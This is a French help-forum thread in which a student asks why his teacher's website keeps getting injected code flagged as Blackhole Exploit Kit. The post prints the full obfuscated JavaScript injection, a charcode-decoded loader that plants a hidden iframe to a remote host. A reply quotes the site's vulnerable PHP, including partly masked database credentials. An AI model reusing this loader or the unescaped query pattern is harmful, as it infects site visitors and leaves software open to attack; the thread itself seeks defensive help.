Hack de site : Injection de code

nbs28 -
EGP-Swyx Messages postés 7141 Statut Contributeur - 1 août 2013 à 09:15

Bonjour,

j'ai créé un site pour mon professeur de maths, pour qu'il puisse déposer des fichiers.

Il y a un mois, j'ai subi des attaques par injection de code.

Cette semaine, cela recommence.

Avg me détecte Exploit Blackhole Exploit Kit (type 2602).

On m'a insérer du code dans tous les fichiers js.

En prime, sur ma page d'accueil, j'ai ceci :

#0f2490#
                                                                                                                                                                                                                                                                                                                                                                                                                echo "                                                                                                                                                                                                                                                                                                                                                                                                                <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                                                                                                                                                                                ps=\"s\"+\"p\"+\"l\"+\"i\"+\"t\";asd=function(){--(d.body)};a=(\"47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,172,154,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,172,154,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,152,154,152,160,163,171,150,200,165,150,160,153,174,65,152,166,164,66,166,173,157,154,171,66,113,111,164,176,130,140,137,152,65,167,157,167,56,102,24,21,47,172,154,65,172,173,200,163,154,65,167,166,172,160,173,160,166,165,47,104,47,56,150,151,172,166,163,174,173,154,56,102,24,21,47,172,154,65,172,173,200,163,154,65,151,166,171,153,154,171,47,104,47,56,67,56,102,24,21,47,172,154,65,172,173,200,163,154,65,157,154,160,156,157,173,47,104,47,56,70,167,177,56,102,24,21,47,172,154,65,172,173,200,163,154,65,176,160,153,173,157,47,104,47,56,70,167,177,56,102,24,21,47,172,154,65,172,173,200,163,154,65,163,154,155,173,47,104,47,56,70,167,177,56,102,24,21,47,172,154,65,172,173,200,163,154,65,173,166,167,47,104,47,56,70,167,177,56,102,24,21,24,21,47,160,155,47,57,50,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,172,154,56,60,60,47,202,24,21,47,153,166,152,174,164,154,165,173,65,176,171,160,173,154,57,56,103,153,160,175,47,160,153,104,143,56,172,154,143,56,105,103,66,153,160,175,105,56,60,102,24,21,47,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,172,154,56,60,65,150,167,167,154,165,153,112,157,160,163,153,57,172,154,60,102,24,21,47,204,24,21,204,24,21,155,174,165,152,173,160,166,165,47,132,154,173,112,166,166,162,160,154,57,152,166,166,162,160,154,125,150,164,154,63,152,166,166,162,160,154,135,150,163,174,154,63,165,113,150,200,172,63,167,150,173,157,60,47,202,24,21,47,175,150,171,47,173,166,153,150,200,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,175,150,171,47,154,177,167,160,171,154,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,160,155,47,57,165,113,150,200,172,104,104,165,174,163,163,47,203,203,47,165,113,150,200,172,104,104,67,60,47,165,113,150,200,172,104,70,102,24,21,47,154,177,167,160,171,154,65,172,154,173,133,160,164,154,57,173,166,153,150,200,65,156,154,173,133,160,164,154,57,60,47,62,47,72,75,67,67,67,67,67,61,71,73,61,165,113,150,200,172,60,102,24,21,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,47,104,47,152,166,166,162,160,154,125,150,164,154,62,51,104,51,62,154,172,152,150,167,154,57,152,166,166,162,160,154,135,150,163,174,154,60,24,21,47,62,47,51,102,154,177,167,160,171,154,172,104,51,47,62,47,154,177,167,160,171,154,65,173,166,116,124,133,132,173,171,160,165,156,57,60,47,62,47,57,57,167,150,173,157,60,47,106,47,51,102,47,167,150,173,157,104,51,47,62,47,167,150,173,157,47,101,47,51,51,60,102,24,21,204,24,21,155,174,165,152,173,160,166,165,47,116,154,173,112,166,166,162,160,154,57,47,165,150,164,154,47,60,47,202,24,21,47,175,150,171,47,172,173,150,171,173,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,165,150,164,154,47,62,47,51,104,51,47,60,102,24,21,47,175,150,171,47,163,154,165,47,104,47,172,173,150,171,173,47,62,47,165,150,164,154,65,163,154,165,156,173,157,47,62,47,70,102,24,21,47,160,155,47,57,47,57,47,50,172,173,150,171,173,47,60,47,55,55,24,21,47,57,47,165,150,164,154,47,50,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,67,63,47,165,150,164,154,65,163,154,165,156,173,157,47,60,47,60,47,60,24,21,47,202,24,21,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,204,24,21,47,160,155,47,57,47,172,173,150,171,173,47,104,104,47,64,70,47,60,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,175,150,171,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,51,102,51,63,47,163,154,165,47,60,102,24,21,47,160,155,47,57,47,154,165,153,47,104,104,47,64,70,47,60,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,163,154,165,156,173,157,102,24,21,47,171,154,173,174,171,165,47,174,165,154,172,152,150,167,154,57,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,163,154,165,63,47,154,165,153,47,60,47,60,102,24,21,204,24,21,160,155,47,57,165,150,175,160,156,150,173,166,171,65,152,166,166,162,160,154,114,165,150,151,163,154,153,60,24,21,202,24,21,160,155,57,116,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21\"[ps](\",\"));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],5+3);}try{asd()}catch(q){yy=50-50;}try{yy/=18}catch(pq){yy=1;}if(!yy)eval(String[\"fr\"+\"omCharCode\"].apply(String,a));</script>";

#/0f2490#

PS : Je sais que le site est moche, il est en développement.

Que puis-je faire, sachant que je me suis prémuni contre les injections sql, les formulaires redirigent le message vers une adresse mail, et que les attaques MS-DOS ne fonctionnent pas, j'ai testé.

Quand je supprime le code, il revient.

*est-ce que quelqu'un sait ce que font ces codes ?

Pour ceux qui veulent aller voir, l'adresse est http://milletvaldevoise.free.fr

Afficher la suite

A voir également:

Hack de site : Injection de code
Site de telechargement - Accueil - Outils
Site x - Guide
Site de partage de photos - Guide
Site comme coco - Accueil - Réseaux sociaux
Quel site remplace coco - Accueil - Réseaux sociaux

4 réponses

Réponse 1 / 4

EGP-Swyx Messages postés 7141 Statut Contributeur 625

Je pense que c'est plus de l'ordre du développement web non? (programmation web?)

Tu devrais changer la catégorie et mettre un titre plus explicite style
(faille de sécurité, injection de code)

Parce que on dirait (au titre) que tu demande un tuto.

Réponse 2 / 4

Malekal_morte- Messages postés 184348 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention 24 693

Salut,

ca craint ce site, XSS, doit y avoir des SQL injection, vu comment tu balances les variaibles...
$req = mysql_query('SELECT content FROM classes WHERE actif=1') OR die('Erreur de la requÃªte MySQL');
while($donnees = mysql_fetch_assoc($req))
{
echo '<li><a href="classe.php?classe=' . $donnees['content'] . '">' . $donnees['content'] . '</a></li>';
}
?>

Tu vas te faire réhacker... un jour, ça c'est sûr.

<?php
$server = 'millet****.sql.free.fr';
$connexion = mysql_connect($server, 'millet****, 'boulot****') OR die('Erreur de connexion');
mysql_select_db('millet****', $connexion) OR die('Erreur de sÃ©lection de la base');
?>

Like the angel you are, you laugh creating a lightness in my chest,
Your eyes they penetrate me,
(Your answer's always 'maybe')
That's when I got up and left

Réponse 3 / 4

nbs28 Messages postés 26 Statut Membre 75

Comment tu as pu voir le code source php ?

Réponse 4 / 4

Malekal_morte- Messages postés 184348 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention 24 693

Parce que ton site est une passoire.

envoie un message en privé, que je t'explique mais bon y a du boulot..

Injhall Messages postés 5842 Statut Membre 1 020

Petite question : pourquoi en message privé ?
On est sur un forum d'entraide, ça peut aider d'autre personne à résoudre des problèmes similaires ;)

Malekal_morte- Messages postés 184348 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention 24 693

y aussi des gros c*ns :)
je copie/collerai quand il aura sécuriser son site.
Sinon ça peux permettre qui lit de faire n'importe quoi.

EGP-Swyx Messages postés 7141 Statut Contributeur 625

+1 pour le mp. je plussoie. tu postera un log des correctifs apportés. c'est plus simple

Discussions similaires

Coco Chat : nouveau lien !

Que signifie ''Votre colis est arrivé sur son site de distribution'' ?

Colis en cours de transport vers votre site de livraison ?

Hack de site : Injection de code

4 réponses

Votre réponse

Discussions similaires

Newsletters